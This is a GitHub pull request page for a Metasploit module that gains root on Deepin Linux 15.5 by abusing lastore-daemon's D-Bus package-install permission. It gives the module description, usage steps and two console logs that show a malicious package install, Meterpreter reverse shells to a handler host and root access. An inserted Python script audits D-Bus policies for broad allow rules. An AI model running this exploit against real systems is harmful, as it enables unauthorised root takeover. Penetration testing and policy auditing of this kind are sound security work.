Add lastore-daemon D-Bus Privilege Escalation exploit #9756

Merged
merged 2 commits into from Apr 20, 2018

@bcoles bcoles commented Mar 24, 2018

Add lastore-daemon D-Bus Privilege Escalation exploit.

        This module attempts to gain root privileges on Deepin Linux systems
        by using lastore-daemon to install a package.

        The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any
        user in the sudo group to install arbitrary system packages without
        providing a password, resulting in code execution as root. By default,
        the first user created on the system is a member of the sudo group.

        This module has been tested successfully with lastore-daemon version
        0.9.53-1 on Deepin Linux 15.5 (x64).

Verification

  • Start msfconsole
  • Get a session
  • use exploit/linux/local/lastore_daemon_dbus_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf5 > use exploit/linux/local/lastore_daemon_dbus_priv_esc 
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Building package...
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/control' (98 bytes) ...
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/postinst' (28 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.1sZZ46ozIH' (207 bytes) ...
[*] Installing package...
[*] Sending stage (857352 bytes) to 172.16.191.200
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.200:51464) at 2018-03-24 18:45:29 -0400
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/control
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/postinst
[+] Deleted /tmp/.1sZZ46ozIH
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN
[*] Removing package...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.200
OS           : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
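
The module description above attributes the issue to a D-Bus policy that lets a whole group reach a root-owned package service. As an added example (not part of this pull request or the module's code), the following audit flags system-bus `<allow>` rules that let a non-root principal send any message to a service. The sample policy and the bus name `org.example.PkgDaemon` are constructed placeholders, and the two directories are the usual system-bus policy locations, assumed here.

```python
import glob
import xml.etree.ElementTree as ET

# Constructed sample policy, NOT the real lastore-daemon file; the bus name
# org.example.PkgDaemon is a placeholder.
SAMPLE_POLICY = """<busconfig>
  <policy user="root">
    <allow own="org.example.PkgDaemon"/>
    <allow send_destination="org.example.PkgDaemon"/>
  </policy>
  <policy group="sudo">
    <allow send_destination="org.example.PkgDaemon"/>
  </policy>
  <policy context="default">
    <allow send_destination="org.example.PkgDaemon"
           send_interface="org.freedesktop.DBus.Introspectable"/>
  </policy>
</busconfig>"""

# Attributes that narrow an <allow> rule to particular messages.
NARROWING = ("send_interface", "send_member", "send_path", "send_type")
SCOPES = ("user", "group", "context", "at_console")

def audit_policy(xml_text):
    """Return (scope, bus name) for each non-root <allow> admitting any message to a service."""
    findings = []
    for policy in ET.fromstring(xml_text).iter("policy"):
        if policy.get("user") == "root":
            continue  # root talking to a root service crosses no privilege boundary
        scope = next((f"{k}={policy.get(k)}" for k in SCOPES if k in policy.attrib), "unscoped")
        for allow in policy.findall("allow"):
            dest = allow.get("send_destination")
            if dest and not any(a in allow.attrib for a in NARROWING):
                findings.append((scope, dest))
    return findings

def audit_system_bus(dirs=("/etc/dbus-1/system.d", "/usr/share/dbus-1/system.d")):
    """Audit installed system-bus policy files; unreadable or malformed files are skipped."""
    results = {}
    for d in dirs:
        for path in sorted(glob.glob(d + "/*.conf")):
            try:
                with open(path, "rb") as fh:
                    found = audit_policy(fh.read())
            except (OSError, ET.ParseError):
                continue
            if found:
                results[path] = found
    return results
```

A finding is a prompt for review rather than proof of a flaw: a service that accepts broad senders may still authorize each privileged method itself.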

@bwatters-r7 bwatters-r7 self-assigned this Apr 20, 2018
@bwatters-r7 bwatters-r7 merged commit d5961f2 into rapid7:master Apr 20, 2018
3 checks passed
bwatters-r7 added a commit that referenced this issue Apr 20, 2018
Merge branch 'land-9756' into upstream-master

@bwatters-r7 bwatters-r7 commented Apr 20, 2018

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.111:4567 
[*] Sending stage (812100 bytes) to 192.168.135.158
[*] Meterpreter session 3 opened (192.168.135.111:4567 -> 192.168.135.158:41644) at 2018-04-20 15:33:09 -0500

meterpreter > sysinfo
Computer     : 192.168.135.158
OS           : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(multi/handler) > use exploit/linux/local/lastore_daemon_dbus_priv_esc
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 3
session => 3
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.111:4444 
[*] Building package...
[*] Writing '/tmp/.JtsRLYgyJ7fAQR/DEBIAN/control' (110 bytes) ...
[*] Writing '/tmp/.JtsRLYgyJ7fAQR/DEBIAN/postinst' (28 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.VqngDqJ8fr' (207 bytes) ...
[*] Installing package...
[*] Sending stage (857352 bytes) to 192.168.135.158
[*] Meterpreter session 4 opened (192.168.135.111:4444 -> 192.168.135.158:37688) at 2018-04-20 15:34:22 -0500
[+] Deleted /tmp/.JtsRLYgyJ7fAQR/DEBIAN/control
[+] Deleted /tmp/.JtsRLYgyJ7fAQR/DEBIAN/postinst
[+] Deleted /tmp/.VqngDqJ8fr
[+] Deleted /tmp/.JtsRLYgyJ7fAQR/DEBIAN
[*] Removing package...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

@bwatters-r7 bwatters-r7 commented Apr 20, 2018

Release Notes

The exploits/linux/local/lastore_daemon_dbus_priv_esc module has been added to the framework. It abuses unauthenticated package installation through lastore-daemon D-Bus version 0.9.53-1 to gain root privileges on Deepin Linux 15.5 systems.

@bcoles bcoles commented Apr 20, 2018

Thanks

@bcoles bcoles deleted the lastore_daemon_dbus_priv_esc branch Apr 20, 2018
msjenkins-r7 pushed a commit that referenced this issue Apr 23, 2018
Merge branch 'land-9756' into upstream-master